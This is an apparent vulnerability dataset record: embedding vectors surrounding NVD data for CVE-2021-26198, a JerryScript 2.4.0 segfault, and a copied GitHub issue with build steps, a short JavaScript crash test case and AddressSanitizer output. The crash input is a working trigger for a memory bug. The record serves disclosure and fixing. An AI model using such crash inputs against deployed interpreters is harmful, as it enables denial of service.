-0.03658555820584297, 0.016161814332008362, 0.012674054130911827, 0.009489578194916248, 0.01411864161491394, 0.02308146469295025, 0.0004980731755495071, 0.0057943095453083515, -0.009425729513168335, 0.005355346482247114, -0.005826233886182308, 0.022474898025393486, 0.0034578300546854734, -0.009705069474875927, 0.014964642003178596, -0.016520965844392776, 0.012147299014031887, 0.011548712849617004, 0.0009258125210180879, -0.032275740057229996, 0.013368413783609867, 0.008523860014975071, 0.025411957874894142, -0.00592599855735898, 0.0040663923136889935, 0.012171242386102676, 0.019426101818680763, -0.008292406797409058, -0.020431725308299065, -0.009992390871047974, 0.022458935156464577, 0.009178314357995987, -0.00305278692394495, 0.005259572993963957, 0.0011572656221687794, -0.0028313102666288614, 0.007913302630186081, 0.036138612776994705, 0.007709783501923084, -0.01272992230951786, 0.0057424320839345455, -0.010024314746260643, 0.00017733100685290992, 0.016728475689888, 0.008144755847752094, -0.008922917768359184, -0.0007921283831819892, 0.0050640348345041275, 0.006209328770637512, -0.01636134274303913, -0.0057783471420407295, 0.0028612397145479918, -0.008699445053935051, 0.0031146409455686808, -0.007115188520401716, -0.0081966333091259, 0.0008943867869675159, -0.003148560645058751, 0.004465449135750532, 0.012346827425062656, -0.007721755653619766, 0.015810644254088402, 0.01952187530696392, -0.01255433727055788, -0.013559960760176182, 0.0019703444559127092, -0.007438424974679947, -0.02482135407626629, -0.0008634598343633115, -0.002152913250029087, -0.020766932517290115, -0.021213876083493233, -0.012123355641961098, 0.007330679334700108, 0.00769382156431675, 0.00960929598659277, 0.004501364193856716, -0.03133396431803703, -0.001595230889506638, 0.023847654461860657, 0.013089073821902275, 0.0002805870317388326, -0.0065126121044158936, 0.004900421481579542, -0.007949218153953552, -0.005806281231343746, 0.013512074016034603, -0.007278801873326302, -0.009513521566987038, -0.0041581750847399235, -0.0024342485703527927, -0.013783433474600315, -0.010862334631383419, -0.014310188591480255, -0.010918202809989452, 0.0050999498926103115, -0.012450582347810268, 0.0014066763687878847, -0.013767470605671406, 0.041023071855306625, 0.0040085287764668465, 0.023576295003294945, 0.005798300262540579, 0.0072069717571139336, 0.012450582347810268, -0.0064766970463097095, 0.0092421630397439, 0.013017243705689907, 0.025890827178955078, -0.001028569764457643, -0.023496484383940697, 0.007969170808792114, -0.0213256124407053, 0.007494292687624693, -0.0016032119747251272, 0.017382929101586342, -0.014437886886298656, 0.011245429515838623, 0.0013029215624555945, 0.0042938548140227795, 0.00331217423081398, -0.0050281197763979435, 0.0092421630397439, -0.0038668636698275805, -0.011189562268555164, 0.008292406797409058, -0.0012410676572471857, -0.0045572323724627495, 0.00979286152869463, -0.007709783501923084, -0.013631791807711124, 0.01170035544782877, 0.005802290514111519, 0.007897340692579746, -0.010535107925534248, -0.017287155613303185, -0.01995285600423813, -0.014717226848006248, -0.01013605110347271, 0.013456206768751144, -0.006348998751491308, 0.015898436307907104, -0.008188651874661446, -0.010207881219685078, 0.01011210773140192, 0.02376784197986126, 0.010271730832755566, 0.013982961885631084, 0.005036100745201111, 0.012785790488123894, 0.009521503001451492, 0.010495202615857124, 0.0016949950950220227, -0.007677859161049128, 0.015068396925926208, -0.013328508473932743, 0.016002191230654716, -0.0006764018326066434, 0.012634148821234703, 0.0044854022562503815, 0.010335579514503479, 0.00531943142414093, 0.02065519616007805, -0.017175419256091118, -0.02649739384651184, -0.009952484630048275, -0.013959018513560295, -0.010495202615857124, 0.021804481744766235, -0.008212595246732235, 0.0042100525461137295, 0.0022027953527867794, -0.0037810662761330605, 0.013839301653206348, 0.0005097954999655485, 0.018612025305628777, -0.007901331409811974, -0.0027135885320603848, -0.0060736495070159435, -0.0057783471420407295, 0.02895558439195156, 0.004080359358340502, 0.013679678551852703, -0.006827867589890957, 0.0014535655500367284, 0.019793232902884483, -0.02162889577448368, -0.005487035494297743, -0.00010063721856568009, 0.022091802209615707, -0.007566123269498348, -0.015411586500704288, 0.009377842769026756, 0.0341273657977581, -0.011987675912678242, 0.015802662819623947, -0.004309816751629114, 0.009521503001451492, 0.012977337464690208, 0.022251425310969353, 0.014437886886298656, -0.00618937611579895, 0.007797576487064362, 0.009202257730066776, -0.028444791212677956, -0.001761837163940072, -0.011397071182727814, 0.006636320147663355, 0.017542552202939987, 0.00812879391014576, -0.010606938041746616, -0.0022167623974382877, -0.005682573653757572, 0.013456206768751144, -0.0040663923136889935, -0.01081444788724184, 0.010766561143100262, -0.012833677232265472, 0.0018406510353088379, 0.014166528359055519, 0.016999833285808563, -0.02263452112674713, -0.017574476078152657, -0.0013637777883559465, 0.01517215184867382, -0.0013587895082309842, -0.008763294667005539, -0.0009273089817725122, 0.012737903743982315, 0.00470887403935194, 0.006428810302168131, 0.015036472119390965, -0.017989495769143105, -0.009234181605279446, 0.006604395341128111, -0.020160365849733353, 0.010447315871715546, -0.016967909410595894, 0.0026297864969819784, -0.0004970755544491112, -0.02303357794880867, 0.006724112667143345, -0.0042260149493813515, -0.010766561143100262, 0.02483731508255005, 0.002014240948483348, -0.0042419773526489735, 0.014382018707692623, -0.02273029461503029, 0.005455111153423786, -0.009146389551460743, 0.0026257960125803947, -0.00488046882674098, 0.0023644135799258947, -0.001368765952065587, -0.0015912402886897326, -0.01645711623132229, -0.0033281364012509584, -0.013520055450499058, -0.0026896449271589518, 0.011149656027555466, -0.023496484383940697, -0.0008060953696258366, 0.008619633503258228, 0.0028791972436010838, 0.009154370054602623, 0.008324331603944302, -0.0013737541157752275, -0.0009756946819834411, 0.02935464307665825, 0.008292406797409058, 0.010080182924866676, -0.0017728112870827317, -0.011421014554798603, 0.003505716798827052, -0.029099246487021446, -0.0044175623916089535, -0.006049706134945154, -0.0009951486717909575, -0.023496484383940697, -0.000020436089471331798, 0.001080447225831449, -0.015236001461744308, 0.005303469020873308, 0.014741170220077038, -0.007294764276593924, 0.008204614743590355, 0.006436791270971298, 0.012011619284749031, -0.009968447498977184, -0.0054830447770655155, -0.0007123169489204884, -0.0027614752762019634, 0.00944169145077467, 0.01640922948718071, 0.0012540370225906372, -0.02790207415819168, 0.004493383225053549, 0.0058661396615207195, 0.011373127810657024, -0.0163932666182518, 0.007159085012972355, 0.008080907166004181, -0.001020588562823832, -0.0004616592195816338, -0.007769642397761345, -0.006516602821648121, -0.01920262910425663, -0.0057623847387731075, -0.000346431479556486, -0.0006040727021172643, 0.013296583667397499, -0.010335579514503479, -0.007570113521069288, -0.015036472119390965, -0.028540566563606262, 0.0022626540157943964, -0.020479612052440643, 0.016305474564433098, -0.017686212435364723, -0.007653915788978338, -0.004668968264013529, 0.013791413977742195, -0.022889917716383934, 0.02751898020505905, -0.013687659054994583, -0.006640310399234295, 0.02089463174343109, 0.017638325691223145, 0.02062327228486538, -0.0025140598881989717, 0.006971527822315693, -0.01554726529866457, 0.03142973780632019, -0.005195723846554756, 0.0002576412516646087, 0.0035775471478700638, -0.011891902424395084, -0.012538375332951546, -0.0068597919307649136, 0.03139781579375267, -0.014773095026612282, -0.026337770745158195, 0.010415391065180302, -0.003713226644322276, 0.007278801873326302, 0.010734636336565018, 0.014733188785612583, -0.007230915129184723, 0.01776602305471897, -0.012370770797133446, 0.00023157784016802907, 0.004525308031588793, 0.012873582541942596, -0.007250867784023285, 0.006939603481441736, 0.018915308639407158, 0.0013827329967170954, -0.0032323626801371574, 0.010854354128241539, 0.029035396873950958, -0.007717764936387539, 0.0031884664203971624, -0.001919464790262282, -0.027423206716775894, 0.003769094590097666, 0.023273011669516563, 0.022490859031677246, 0.0019553799647837877, -0.014828963205218315, -0.018388552591204643, 0.0021509178914129734, -0.0029151123017072678, 0.013184847310185432, -0.03387196734547615, 0.004912393167614937, -0.005076006520539522, -0.006065668538212776, -0.020016705617308617, 0.020846744999289513, 0.014828963205218315, -0.010207881219685078, 0.02895558439195156, 0.0064048669300973415, -0.013176866807043552, 0.015076378360390663, 0.001892528380267322, 0.002833305625244975, -0.00043746636947616935, -0.011716317385435104, 0.01990496926009655, 0.026034487411379814, 0.022826068103313446, 0.002729550702497363, -0.009361879900097847, 0.009729012846946716, -0.012793771922588348, 0.014629433862864971, -0.013575923629105091, -0.0019783256575465202, 0.006237262859940529, 0.010934165678918362, 0.027407243847846985, 0.008643577806651592, 0.005694545339792967, -0.03955454379320145, -0.0040863449685275555, 0.00706331105902791, -0.019473988562822342, -0.013982961885631084, 0.016345379874110222, 0.0004337252175901085, -0.012322884052991867, -0.0002858246734831482, -0.011740260757505894, 0.01222711056470871, 0.0314457006752491, -0.019027043133974075, 0.021006368100643158, -0.01604209654033184, 0.010942146182060242, -0.0034019621089100838, -0.0025419939775019884, -0.003777075791731477, 0.014884830452501774, -0.019043006002902985, 0.0006659266073256731, -0.021581009030342102, 0.007598047610372305, 0.02022421546280384, -0.017335042357444763, 0.001683023408986628, -0.018324702978134155, 0.013176866807043552, 0.0010505178943276405, 0.025747165083885193, 0.029179057106375694, -0.011923827230930328, -0.01645711623132229, -0.01533975638449192, -0.0011123717995360494, 0.013344470411539078, 0.02510867454111576, 0.0019653562922030687, -0.02229931205511093, 0.011277354322373867, -0.0018077287822961807, 0.008025038987398148, -0.0030567776411771774, 0.006293131038546562, 0.024980975314974785, 0.023544371128082275, -0.012418657541275024, -0.0030847114976495504, 0.01749466359615326, -0.0008055965881794691, -0.010447315871715546, 0.011413034051656723, 0.008771276101469994, 0.007047348655760288, 0.03773484379053116, -0.004804647993296385, -0.009673144668340683, 0.012761847116053104, 0.0066842068918049335, 0.017750060185790062, -0.007358613424003124, 0.005040091462433338, -0.010998014360666275, -0.015475435182452202, -0.0018965189810842276, 0.013001280836760998, 0.013033205643296242, 0.015164170414209366, 0.006608386058360338, -0.016824249178171158, -0.0017468725563958287, 0.027758413925766945, 0.02822132036089897, 0.006137498654425144, 0.03288230672478676, -0.015228020027279854, -0.014565585181117058, -0.014421924948692322, -0.01608998328447342, -0.0060058096423745155, 0.001725922105833888, 0.007366594392806292, 0.013472168706357479, -0.008180671371519566, -0.008946861140429974, 0.007737717591226101, -0.01782987266778946, -0.032355550676584244, 0.008444048464298248, 0.0008509893086738884, 0.003787052119150758, -0.006293131038546562, -0.0044015999883413315, -0.028732113540172577, 0.0040145148523151875, 0.003856887109577656, -0.0791090875864029, 0.009210238233208656, 0.004900421481579542, -0.0057424320839345455, 0.008611653000116348, -0.005467082839459181, 0.01431817002594471, 0.0057105072773993015, -0.00610158359631896, 0.0049922047182917595, -0.005487035494297743, -0.00479267630726099, 0.0051837521605193615, -0.0034498488530516624, 0.008843106217682362, 0.003739165375009179, 0.004700893070548773, 0.006297121290117502, -0.0040085287764668465, 0.013671697117388248, 0.021373499184846878, -0.014382018707692623, -0.015204076655209064, 0.01328062079846859, -0.003120626788586378, -0.0021309650037437677, 0.004513336345553398, -0.009920559823513031, -0.02060730941593647, -0.018771646544337273, 0.001751860836520791, 0.015379661694169044, 0.010670787654817104, 0.020511535927653313, 0.005187742877751589, -0.02271433174610138, -0.02095847949385643, -0.015427548438310623, 0.011460920795798302, 0.0008879021042957902, 0.007374575827270746, -0.006009800359606743, -0.011117731221020222, -0.012043544091284275, -0.005650648847222328, -0.015076378360390663, 0.0006335031939670444, 0.029131170362234116, -0.011285335756838322, 0.004525308031588793, -0.0043976097367703915, 0.005004176404327154, 0.01098205242305994, 0.0017279173480346799, -0.0023165266029536724, 0.0092421630397439, 0.015236001461744308, -0.008659539744257927, -0.005275535397231579, -0.029817549511790276, -0.007554151583462954, 0.009744974784553051, 0.0006250232108868659, -0.009736994281411171, 0.007969170808792114, 0.018931269645690918, 0.01344822533428669, 0.013831320218741894, 0.008691464550793171, -0.018915308639407158, -0.0010704707819968462, -0.01327264029532671, -0.012099412269890308, 0.0032622921280562878, -0.00018194511358160526, 0.0053752996027469635, -0.009896616451442242, -0.003914750646799803, 0.013136960566043854, 0.004134231712669134, 0.007226924411952496, -0.008005086332559586, 0.012011619284749031, -0.0011173599632456899, -0.012290959246456623, 0.009321974590420723, 0.006620357744395733, 0.0016091978177428246, -0.0007567121065221727, -0.005155818071216345, 0.012801752425730228, 0.00960929598659277, -0.012913488782942295, 0.04577983543276787, 0.025986600667238235, -0.008009076118469238, -0.014637415297329426, -0.0035715613048523664, -0.014134603552520275, 0.004090335685759783, -0.013871225528419018, 0.0033361176028847694, -0.004405590705573559, 0.023831691592931747, 0.008172689937055111, 0.0014236363349482417, -0.017957570031285286, -0.02065519616007805, 0.01275386568158865, 0.007625981699675322, 0.007202981039881706, -0.005522950552403927, 0.006444772705435753, 0.008037010207772255, 0.010383466258645058, -0.008340293541550636, 0.0013587895082309842, 0.004289864096790552, -0.0049602799117565155, 0.007717764936387539, -0.0069994619116187096, -0.03166917338967323, -0.0050999498926103115, 0.003569565946236253, -0.0013009262038394809, -0.004413571674376726, 0.006987490225583315, 0.016664626076817513, 0.0007168063893914223, -0.014382018707692623, 0.010231824591755867, 0.005159808788448572, 0.0064926594495773315, 0.006556508596986532, 0.011325241066515446, -0.008467991836369038, 0.02961003966629505, -0.014366056770086288, 0.009218219667673111, -0.013168885372579098, -0.01135716587305069, -0.0040444438345730305, 0.0049602799117565155, 0.004004538059234619, -0.01712753251194954, 0.00014390997239388525, -0.007526217494159937, 0.026002561673521996, 0.01985708251595497, -0.0007422462804242969, -0.003888811683282256, -0.009393804706633091, -0.0019404152408242226, 0.010598957538604736, 0.013456206768751144, 0.03238747641444206, 0.018995119258761406, 0.008172689937055111, -0.016951946541666985, -0.002677673241123557, -0.012530393898487091, 0.015156189911067486, -0.0018885378958657384, -0.003723202971741557, -0.012410677038133144, 0.0016091978177428246, -0.010598957538604736, 0.0042419773526489735, -0.01188392098993063, 0.0013128980062901974, 0.01013605110347271, 0.026992224156856537, 0.011692374013364315, 0.011101769283413887, 0.02996120974421501, -0.012642130255699158, -0.011764204129576683, -0.0059020547196269035, -0.003769094590097666, -0.0024222766514867544, 0.0017039739759638906, 0.006293131038546562, -0.01379939541220665, -0.020160365849733353, -0.010120089165866375, -0.0066283387131989, 0.012969356961548328, -0.008755313232541084, 0.003244334366172552, 0.0007337662973441184, 0.026816638186573982, 0.02900347113609314, -0.0027255602180957794, -0.0008474975475110114, -0.0019843115005642176, 0.003826957894489169, -0.002649739384651184, 0.018404515460133553, -0.011836034245789051, -0.014797038398683071, 0.008779256604611874, 0.007582085207104683, 0.008635596372187138, 0.027056073769927025, -0.003583532990887761, -0.024342484772205353, 0.008404143154621124, 0.005331403110176325, -0.006157451309263706, 0.008475973270833492, 0.010000371374189854, 0.00793724600225687, -0.01414258498698473, -0.010064220987260342, 0.007801566738635302, -0.010080182924866676, -0.01786179654300213, 0.030775286257267, -0.007023405283689499, 0.013009262271225452, 0.023863615468144417, -0.008683483116328716, 0.016153832897543907, -0.0065285745076835155, -0.010375485755503178, 0.001971342135220766, 0.017957570031285286, 0.01642519049346447, 0.017574476078152657, 0.011061863973736763, 0.012123355641961098, 0.013328508473932743, 0.025364071130752563, 0.019968818873167038, 0.0041541848331689835, -0.003076730528846383, 0.011780166067183018, 0.021724669262766838, 0.005207695532590151, -0.0033081835135817528, 0.011245429515838623, -0.007230915129184723, -0.021485235542058945, -0.007637953385710716, -0.008835124783217907, 0.008731369860470295, 0.03066354990005493, 0.02756686694920063, 0.010934165678918362, -0.03489355370402336, 0.002651734510436654, -0.009904597885906696, -0.019027043133974075, 0.019489949569106102, 0.0044375150464475155, 0.00024205309455282986, -0.0008659539744257927, -0.007374575827270746, 0.010950127616524696, -0.011692374013364315, -0.008555784821510315, 0.0050081671215593815, 0.03661748021841049, 0.0004569204174913466, -0.009952484630048275, -0.003964632749557495, 0.010016334243118763, -0.03256306052207947, -0.005574828013777733, -0.006552517879754305, 0.015243981964886189, 0.004222024232149124, -0.02196410484611988, -0.012690016999840736, 0.0033959762658923864, -0.017702173441648483, -0.013176866807043552, 0.013520055450499058, -0.005502997897565365, -0.02376784197986126, -0.010088164359331131, -0.016552889719605446, -0.012650110758841038, -0.006153461057692766, 0.01816507987678051, -0.0006559501634910703, -0.027790337800979614, -0.009321974590420723, -0.015643039718270302, 0.024853277951478958, -0.003896792884916067, -0.0019593704491853714, -0.005682573653757572, -0.029083283618092537, -0.025348108261823654, 0.0028353009838610888, 0.0069475844502449036, 0.026241997256875038, 0.010255767963826656, 0.014342113398015499, -0.011444958858191967, -0.012482507154345512, -0.010535107925534248, -0.00006565736839547753, 0.0008634598343633115, -0.005878111347556114, 0.004601128865033388, -0.003643391653895378, 0.0010036287130787969, -0.020080555230379105, 0.02370399422943592, -0.0030268484260886908, 0.013639772310853004, -0.004409581422805786, 0.016616739332675934, 0.02761475369334221, 0.01610594615340233, -0.005993837956339121, -0.007458377629518509, -0.0057224794290959835, -0.00014640408335253596, -0.0038848211988806725, -0.01292945072054863, -0.008009076118469238, -0.007637953385710716, 0.025667354464530945, 0.01781390979886055, -0.010942146182060242, 0.0226664450019598, 0.0046769496984779835, 0.005634686443954706, 0.02164485864341259, -0.013176866807043552, -0.00470887403935194, -0.020687121897935867, 0.004656996577978134, -0.00023856133338995278, -0.0028911689296364784, -0.02273029461503029, 0.006121536251157522, -0.0020970453042536974, -0.00032997035305015743, 0.003679306712001562, 0.02134157530963421, 0.009489578194916248, -0.0044175623916089535, 0.01744677685201168, 0.0013049168046563864, 0.0021429366897791624, -0.0037371700163930655, -0.029035396873950958, 0.01585853099822998, 0.0014316174201667309, 0.009856711141765118, 0.011341203935444355, 0.010766561143100262, 0.013871225528419018, -0.007821519859135151, 0.008204614743590355, 0.023273011669516563, 0.0056546395644545555, -0.02791803702712059, -0.0026098336093127728, -0.0289396233856678, -0.0063889045268297195, 0.014358075335621834, 0.00978488102555275, 0.007530208211392164, 0.0028273197822272778, 0.009034653194248676, 0.012977337464690208, 0.0007751684752292931, 0.02895558439195156, 0.07923678308725357, -0.010167975910007954, 0.008771276101469994, 0.001716943341307342, -0.0015463463496416807, -0.018308740109205246, -0.012322884052991867, 0.05123893544077873, -0.007618000730872154, 0.03447853401303291, -0.010670787654817104, 0.000042275114537915215, -0.022442972287535667, -0.014757132157683372, -0.019777271896600723, 0.004756760783493519, 0.03728789836168289, -0.01590641774237156, 0.003777075791731477, 0.0005686564254574478, -0.005371308885514736, 0.007618000730872154, 0.01115763746201992, 0.0066482918336987495, 0.017941609025001526, -0.008188651874661446, -0.0026796685997396708, -0.017909683287143707, 0.001918467110954225, 0.019122818484902382, -0.016680587083101273, -0.006652282550930977, -0.012259035371243954, 0.00027809294988401234, 0.007294764276593924, -0.0042419773526489735, -0.0035675708204507828, 0.033329252153635025, -0.0013697636313736439, 0.0025180503726005554, 0.017925646156072617, -0.0074663590639829636, 0.001220117206685245, -0.0076100192964077, 0.022873954847455025, -0.0003938195004593581, -0.017351003363728523, -0.008587709628045559, 0.00042524526361376047, -0.005734451115131378, 0.0011542727006599307, 0.00122111476957798, 0.002468168269842863, -0.004146203398704529, 0.02649739384651184, -0.015419567003846169, -0.0023684040643274784, 0.009673144668340683, 0.014805019833147526, -0.007853444665670395, 0.007139131892472506, 0.009505541063845158, 0.004321788903325796, -0.011405052617192268, -0.02723165787756443, -0.010343560948967934, -0.006636320147663355, -0.005171780474483967, -0.01749466359615326, 0.0032124097924679518, -0.00653655594214797, -0.00645275367423892, -0.016600776463747025, -0.013639772310853004, -0.016920022666454315, 0.018643949180841446, 0.004892440512776375, -0.0037990238051861525, -0.007641944102942944, -0.0021130074746906757, 0.005834215320646763, 0.015028491616249084, -0.018963195383548737, -0.0017758042085915804, 0.01889934577047825, 0.017366966232657433, -0.021118102595210075, 0.0007771637756377459, -0.02161293476819992, 0.020112479105591774, 0.010710692964494228, 0.0056187245063483715, -0.02201199159026146, 0.010048258118331432, 0.0034558346960693598, -0.01150880753993988, 0.02097444236278534, -0.00047363093472085893, 0.010503184050321579, -0.0054990071803331375, 0.004804647993296385, 0.018947232514619827, 0.004321788903325796, -0.013982961885631084, 0.007574104238301516, 0.008667521178722382, 0.016305474564433098, 0.013935075141489506, -0.003669330384582281, -0.01645711623132229, 0.005171780474483967, 0.005367318168282509, -0.0027255602180957794, 0.0001252041693078354, 0.010439334437251091, -0.024693654850125313, 0.005826233886182308, -0.0012450582580640912, 0.0003090198733843863, -0.00734664173796773, -0.004253949038684368, -0.0012011619983240962, 0.004601128865033388, 0.009952484630048275, 0.006468716077506542, 0.008906954899430275, 0.006919650826603174, -0.004529298283159733, -0.002729550702497363, 0.003617452923208475, -0.0005945950979366899, 0.00976093765348196, 0.01517215184867382, 0.005981866270303726, 0.010974070988595486, -0.01080646738409996, -0.01637730374932289, 0.008906954899430275, 0.00050131551688537, 0.0362982377409935, 0.015419567003846169, -0.008683483116328716, 0.008236539550125599, 0.009361879900097847, -0.003268277971073985, 0.019027043133974075, 0.0029709802474826574, 0.005487035494297743, 0.02263452112674713, -0.003531655529513955, -0.0068558016791939735, 0.008420105092227459, 0.02198006585240364, -0.004812628962099552, -0.0005242613260634243, -0.012745884247124195, -0.0283490177243948, 0.005894073750823736, 0.01781390979886055, 0.0049203746020793915, -0.01636134274303913, -0.011397071182727814, 0.006604395341128111, 0.017718136310577393, 0.026050448417663574, 0.0226664450019598, 0.008859068155288696, -0.007550160866230726, 0.0017109573818743229, 0.0007547168061137199, 0.01031163614243269, 0.024980975314974785, 0.0029749709647148848, 0.0013976976042613387, 0.008659539744257927, 0.004377656616270542, 0.00723490584641695, -0.019713422283530235, -0.01627354882657528, 0.005702526308596134, -0.0062851496040821075, 0.011995657347142696, 0.010622900910675526, 0.043864358216524124, -0.01644115336239338, 0.01464539673179388, 0.01706368289887905, -0.0016341389855369925, -0.004844553302973509, 0.01810123212635517, -0.0039307125844061375, 0.03534049913287163, -0.01746273972094059, -0.018244892358779907, 0.006592423655092716, 0.013751508668065071, 0.00857174675911665, -0.013895168900489807, -0.01533975638449192, -0.013815357349812984, 0.005770366173237562, 0.009976428002119064, 0.0050600445829331875, 0.0042260149493813515, 0.005083987955003977, 0.03693672642111778, 0.010319617576897144, 0.01627354882657528, 0.009178314357995987, 0.014709245413541794, 0.014038830064237118 ]
104
CVE-2021-26198
2021-06-10T23:15:08.433000
An issue was discovered in JerryScript 2.4.0. There is a SEVG in ecma_deref_bigint in ecma-helpers.c file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4402" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4402
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ``` ###### Test case ``` var p = new Proxy(Function(), { get: function closure() { eval("o.p.y"); delete closure; return closure == arguments.callee && !(new String(undefined)); }}); Function.prototype.bind.call(p); ``` ###### Output ``` ReferenceError: o is not defined ASAN:DEADLYSIGNAL ================================================================= ==24756==ERROR: AddressSanitizer: SEGV on unknown address 0xbebebeb8 (pc 0x56782398 bp 0xff8c72d8 sp 0xff8c72b0 T0) ==24756==The signal is caused by a READ memory access. #0 0x56782397 in ecma_deref_bigint /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264 #1 0x5677d2c5 in ecma_free_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:1147 #2 0x567c10fc in ecma_gc_free_object /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1742 #3 0x567c1e68 in ecma_gc_run /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1898 #4 0x5678385a in ecma_finalize /root/jerryscript/jerry-core/ecma/base/ecma-init-finalize.c:83 #5 0x567acb1d in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:256 #6 0x567a7a9c in main /root/jerryscript/jerry-main/main-unix.c:324 #7 0xf774af20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #8 0x566473d0 (/root/jerryscript/build/bin/jerry+0x1d3d0) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264 in ecma_deref_bigint ==24756==ABORTING ``` Credits: Found by chong from OWL337.
SEVG in ecma_deref_bigint
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4402/comments
0
2021-01-02T14:29:48
2021-01-07T11:10:55Z
https://github.com/jerryscript-project/jerryscript/issues/4402
777,469,127
4,402
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : SEVG in ecma_deref_bigint Issue date: --- start body --- ###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ``` ###### Test case ``` var p = new Proxy(Function(), { get: function closure() { eval("o.p.y"); delete closure; return closure == arguments.callee && !(new String(undefined)); }}); Function.prototype.bind.call(p); ``` ###### Output ``` ReferenceError: o is not defined ASAN:DEADLYSIGNAL ================================================================= ==24756==ERROR: AddressSanitizer: SEGV on unknown address 0xbebebeb8 (pc 0x56782398 bp 0xff8c72d8 sp 0xff8c72b0 T0) ==24756==The signal is caused by a READ memory access. #0 0x56782397 in ecma_deref_bigint /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264 #1 0x5677d2c5 in ecma_free_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:1147 #2 0x567c10fc in ecma_gc_free_object /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1742 #3 0x567c1e68 in ecma_gc_run /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1898 #4 0x5678385a in ecma_finalize /root/jerryscript/jerry-core/ecma/base/ecma-init-finalize.c:83 #5 0x567acb1d in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:256 #6 0x567a7a9c in main /root/jerryscript/jerry-main/main-unix.c:324 #7 0xf774af20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #8 0x566473d0 (/root/jerryscript/build/bin/jerry+0x1d3d0) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264 in ecma_deref_bigint ==24756==ABORTING ``` Credits: Found by chong from OWL337. --- end body ---
2,156
[ -0.010715563781559467, -0.004018336534500122, -0.004855489823967218, 0.010452458634972572, 0.012230413034558296, 0.0029938200023025274, 0.0026629450730979443, 0.04155470058321953, -0.04665734991431236, 0.03339046239852905, -0.026932422071695328, 0.021335452795028687, 0.0026709181256592274, 0.01103447936475277, 0.030392656102776527, 0.05453456565737724, -0.030791299417614937, -0.005820209626108408, -0.021080320701003075, -0.011704201810061932, 0.01878412812948227, 0.004660154227167368, -0.021383289247751236, 0.02658161334693432, -0.03807852044701576, 0.023934613913297653, -0.006605539005249739, 0.004731909837573767, -0.018353592604398727, 0.027905113995075226, 0.006565674673765898, -0.002355988835915923, -0.02123977802693844, 0.0072234380058944225, 0.0265656691044569, 0.014080123044550419, 0.03165237233042717, 0.05153675749897957, -0.02395056001842022, -0.012094873934984207, -0.020075736567378044, -0.037408798933029175, -0.03980066627264023, 0.04911300167441368, -0.001697228872217238, 0.05230215564370155, 0.03664340078830719, 0.011393259279429913, -0.04723139852285385, 0.03374126926064491, 0.011433123610913754, -0.012645003385841846, -0.010603942908346653, -0.05048433691263199, 0.013801071792840958, -0.031014541164040565, 0.029260504990816116, 0.009639224037528038, 0.014646198600530624, 0.012788514606654644, 0.010396648198366165, 0.002802470698952675, -0.03485747426748276, 0.01637631468474865, 0.0005551124340854585, 0.051632434129714966, -0.02972293272614479, 0.002453656867146492, 0.006693240720778704, 0.015491324476897717, -0.004401035141199827, -0.012780542485415936, 